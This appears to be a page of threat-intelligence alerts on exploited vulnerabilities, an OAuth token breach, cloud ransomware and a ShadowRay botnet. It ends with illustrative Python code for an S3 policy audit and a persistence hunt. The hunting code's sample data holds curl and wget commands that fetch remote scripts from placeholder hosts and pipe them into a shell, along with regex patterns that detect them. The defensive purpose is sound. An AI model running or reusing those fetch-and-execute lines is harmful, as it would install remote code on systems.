
Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


Scattered Lapsus$ Hunters Exploits Salesforce OAuth Tokens via Gainsight Breach

24-Nov-2025
Label: Vulnerability
Threat Level: Medium

The Scattered Lapsus$ Hunters cybercrime group has executed a sophisticated supply chain attack targeting over 200 organizations through compromised OAuth tokens from Salesforce-integrated applications, specifically exploiting Gainsight and previously Salesloft Drift connections to steal sensitive corporate data.

In late November, Salesforce responded by revoking all active tokens associated with Gainsight applications and temporarily removing them from the AppExchange marketplace. The attack campaign began in March 2025 when threat actors gained access to Salesloft’s GitHub repository, stealing OAuth authentication tokens that allowed them to bypass multi-factor authentication and masquerade as trusted applications. These stolen tokens provided unauthorized access to Salesforce instances, enabling lateral movement within cloud environments while evading traditional security controls. The attackers subsequently expanded their operations to target Gainsight, a customer success platform, maintaining persistent access for approximately three months before detection.

The threat actors utilized various VPN services and proxy networks to mask their activities, employing unusual user agent strings. The group’s persistent focus on OAuth token theft and third-party application vulnerabilities represents a significant shift in attack methodologies, exploiting the trust relationships between integrated cloud services rather than directly targeting primary platforms.

Oracle Fusion Middleware Authentication Bypass Vulnerability Actively Exploited

24-Nov-2025
Label: Vulnerability
Threat Level: Medium

CISA has added a critical Oracle Fusion Middleware vulnerability to its Known Exploited Vulnerabilities catalog. CVE-2025-61757 (CVSS Score 9.8) represents a missing authentication flaw that enables complete system takeover through pre-authenticated remote code execution.

The vulnerability affects Oracle Identity Manager, allowing unauthenticated attackers with HTTP network access to compromise the REST WebServices component. The flaw requires no authentication and is easily exploitable, enabling attackers to achieve full system control through the Identity Manager interface. Honeypot analysis revealed active exploitation attempts between August and September 2025, with multiple HTTP POST requests targeting the vulnerable endpoint using 556-byte payloads. The attacks originated from different IP addresses but shared identical user agents, indicating coordinated exploitation efforts that preceded Oracle’s patch release.

FortiWeb Zero-Day Vulnerability Under Active Exploitation

24-Nov-2025
Label: Vulnerability
Threat Level: Medium

A critical OS command injection vulnerability in FortiWeb web application firewall appliances, tracked as CVE-2025-58034, is under active exploitation, prompting urgent warnings from federal cybersecurity authorities. The flaw allows authenticated attackers to execute unauthorized code on the underlying operating system, potentially resulting in full system compromise, data theft, and malicious software deployment. The exploit can be triggered through specially crafted HTTP requests or CLI commands, enabling attackers with initial access to bypass security controls, escalate privileges, and gain system-level execution. Its ability to grant direct access to critical system functions makes the vulnerability especially dangerous for enterprise security infrastructure.

Federal agencies have been given a seven-day deadline to apply patches under the known exploited vulnerabilities directive, highlighting the urgency of addressing this weakness. The vendor has released security updates and mitigation guidance, and organizations are strongly advised to apply these fixes immediately or discontinue use of affected appliances until proper security measures are in place. The ongoing exploitation of CVE-2025-58034 underscores the importance of timely patching, continuous monitoring of security advisories, and proactive risk management for critical enterprise systems.

Chrome V8 Zero-Day Actively Exploited

24-Nov-2025
Label: Vulnerability
Threat Level: Medium

Google has released an emergency Chrome update to address CVE-2025-13223 (CVSS 8.8), a zero-day vulnerability in the V8 JavaScript engine that is actively exploited in the wild. This type confusion flaw enables attackers to achieve heap corruption through malicious web pages.

CVE-2025-13223 represents a critical type confusion vulnerability within Chrome’s V8 engine, allowing remote attackers to exploit heap corruption by tricking users into visiting specially crafted HTML pages. The flaw can lead to unauthorized access to sensitive data and potential system compromise through drive-by attacks. Google’s Threat Analysis Group confirmed active exploitation, prompting the immediate out-of-band security release. The update also patches CVE-2025-13224 (CVSS 8.8), another type confusion vulnerability in V8 discovered through automated vulnerability research.

The patches are available in Chrome versions 142.0.7444.175/.176 for Windows, 142.0.7444.176 for macOS, and 142.0.7444.175 for Linux, with rollout occurring over the coming weeks. Type confusion vulnerabilities occur when programs incorrectly assume data types, leading to memory misinterpretation that attackers can leverage for arbitrary code execution. Other Chromium-based browsers including Microsoft Edge, Brave, and Opera are expected to receive these fixes soon. This incident continues the pattern of V8 engine vulnerabilities being actively exploited throughout 2025, demonstrating the ongoing targeting of this critical browser component.

AWS S3 Ransomware Exploits Cloud Misconfigurations

24-Nov-2025
Label: Trends
Threat Level: Medium

A recent report warns of a shift in ransomware tactics, targeting cloud-native environments like Amazon S3. This evolution poses significant risks as attackers exploit cloud-specific vulnerabilities, leading to potential irreversible data destruction.

The report details five ransomware variants that exploit misconfigurations in cloud storage, such as leaked credentials and overly permissive policies. Attackers leverage native cloud features to encrypt or delete data, making recovery difficult. These tactics include using customer-provided keys or external key stores, which can result in permanent data loss if mismanaged. The common thread is the exploitation of misconfigured storage and stolen credentials, rather than inherent cloud service vulnerabilities.

The analysis concludes that the root cause of these vulnerabilities lies in cloud security missteps by users, not the cloud providers themselves. To mitigate these risks, organizations should ensure proper configuration of storage resources, implement strict access controls, and regularly audit their cloud environments for potential security gaps. Monitoring for unusual access patterns and securing IAM credentials are crucial steps in protecting against these advanced ransomware threats.
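As an added illustration of the audit guidance above (this is example code, not from the report or from CyberProof), the following Python check evaluates a bucket policy and its protection settings offline against the misconfigurations the alert names: a public principal with write or delete rights, uploads with customer-provided (SSE-C) keys not denied, and versioning, MFA Delete or Object Lock absent. The bucket name, the two policies and the settings are constructed inputs; the SSE-C condition key is the one AWS documents for that header.

```python
import json
# Actions that let a caller re-encrypt, overwrite or destroy bucket contents.
DESTRUCTIVE = {"s3:*", "s3:PutObject", "s3:DeleteObject", "s3:DeleteObjectVersion",
               "s3:PutBucketPolicy", "s3:PutLifecycleConfiguration", "s3:DeleteBucket"}
SSEC_KEY = "s3:x-amz-server-side-encryption-customer-algorithm"  # set when an upload supplies a customer key

def _as_set(value):
    return {value} if isinstance(value, str) else set(value or [])

def _anyone(stmt):
    principal = stmt.get("Principal")
    return principal == "*" or (isinstance(principal, dict)
                                and _as_set(principal.get("AWS")) == {"*"})

def _denies_ssec(stmt):
    # A Deny on PutObject conditioned on the SSE-C header being present (Null == false).
    null_cond = stmt.get("Condition", {}).get("Null", {})
    return (stmt.get("Effect") == "Deny"
            and "s3:PutObject" in _as_set(stmt.get("Action"))
            and str(null_cond.get(SSEC_KEY, "")).lower() == "false")

def audit_bucket(policy_json, versioning=False, object_lock=False, mfa_delete=False):
    """Return human-readable findings for one bucket (all inputs constructed)."""
    findings = []
    statements = json.loads(policy_json).get("Statement", [])
    for stmt in statements:
        if stmt.get("Effect") == "Allow" and _anyone(stmt):
            risky = _as_set(stmt.get("Action")) & DESTRUCTIVE
            if risky:
                findings.append("public principal granted " + ", ".join(sorted(risky)))
    if not any(_denies_ssec(s) for s in statements):
        findings.append("no Deny on SSE-C uploads: attacker-held keys can re-encrypt objects")
    if not versioning:
        findings.append("versioning off: overwritten objects cannot be restored")
    elif not mfa_delete:
        findings.append("MFA Delete off: stolen credentials can purge prior versions")
    if not object_lock:
        findings.append("no Object Lock: retention cannot block deletion")
    return findings
# Constructed policies: an overly permissive one and a hardened one.
WEAK_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-bucket/*"}]})
HARDENED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Deny", "Principal": "*", "Action": "s3:PutObject",
     "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"Null": {SSEC_KEY: "false"}}}]})
```

Running `audit_bucket(WEAK_POLICY)` yields four findings, while the hardened policy with versioning, Object Lock and MFA Delete enabled yields none.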

Global Campaign Exploits AI Framework Vulnerability to Build Self-Propagating Botnet

24-Nov-2025
Label: Malware
Threat Level: Medium

Security researchers have identified an active global hacking campaign that exploits CVE-2023-48022 (ShadowRay) in Ray, an open-source AI framework widely used to power modern AI systems. The campaign, which appears to have been active since September 2024, has compromised Ray clusters across multiple continents, turning them into a self-propagating botnet capable of cryptojacking, DDoS attacks, and data exfiltration.

The attackers, operating under the name IronErn440, initially leveraged GitLab as their command-and-control infrastructure before migrating to GitHub after the first repository was taken down. The attack begins with reconnaissance using out-of-band application security testing platforms to identify vulnerable Ray dashboard APIs exposed to the internet. Once identified, attackers exploit the unauthenticated Ray Job Submission APIs to inject malicious payloads, which include LLM-generated code evidenced by characteristic docstrings and error handling patterns. The operation then uses Ray’s legitimate NodeAffinitySchedulingStrategy feature to spread laterally across every node in the cluster, effectively weaponizing the framework’s own orchestration capabilities.

Beyond cryptocurrency mining, the compromised infrastructure serves multiple malicious purposes. Attackers establish persistence through cron jobs running every 15 minutes, systemd services disguised as legitimate system components, and shell profile injections. They implement region-aware malware delivery, detecting victim geography to optimize payload distribution and bypass censorship in certain countries. The operation includes active competition elimination, where attackers deploy scripts to detect and terminate rival cryptocurrency miners while blocking competing mining pools through firewall rules and hosts file modifications. The campaign demonstrates DevOps-style sophistication, using version control platforms for real-time malware updates that propagate across the entire botnet within hours. Evidence shows attackers have accessed sensitive data including MySQL database credentials, proprietary AI models, source code, and cloud credentials from compromised systems, while also deploying DDoS tools targeting production websites and mining infrastructure, transforming the operation into a multi-purpose botnet with global autonomous propagation capabilities.
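As an added hunting example (not code from the researchers or from the alert), the Python below runs simple checks on a Ray host for the persistence artefacts described above: frequent cron schedules that fetch and run remote code, shell-profile lines that do the same on login, and hosts-file sinkholes used to block rival pools. The crontab, profile and hosts content are constructed samples; the repository path, IP address and pool hostnames in them are placeholders.

```python
import re

# Constructed artefacts modelled on the persistence the alert describes; the
# repository path, IP (TEST-NET) and pool hostnames (.invalid) are placeholders.
CRONTAB = """\
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL https://raw.githubusercontent.com/PLACEHOLDER/repo/main/u.sh | bash
"""
PROFILE = """\
export PATH=$PATH:$HOME/.local/bin
(wget -qO- http://203.0.113.10/p.sh | sh) >/dev/null 2>&1 &
"""
HOSTS = """\
127.0.0.1 localhost
0.0.0.0 pool.example-mining.invalid
0.0.0.0 stratum.example-pool.invalid
"""

# A download piped straight into a shell, and code-hosting sites used as update channels.
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b")
HOSTED_UPDATE = re.compile(r"raw\.githubusercontent\.com|gitlab\.com", re.I)

def hunt_cron(text):
    """Flag frequent (*/N minute) schedules whose command fetches and runs remote code."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[0].startswith("*/") and (
                FETCH_PIPE.search(fields[5]) or HOSTED_UPDATE.search(fields[5])):
            hits.append(line)
    return hits

def hunt_profile(text):
    """Flag shell-profile lines that fetch and execute remote content on login."""
    return [l.strip() for l in text.splitlines() if FETCH_PIPE.search(l)]

def hunt_hosts(text):
    """Return hostnames sinkholed to 0.0.0.0, the technique used to block rival pools."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "0.0.0.0":
            hits.extend(parts[1:])
    return hits
```

On a real host the same functions can be fed the output of `crontab -l`, the user's profile files and `/etc/hosts`; a hit is a lead to triage, not proof of compromise.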
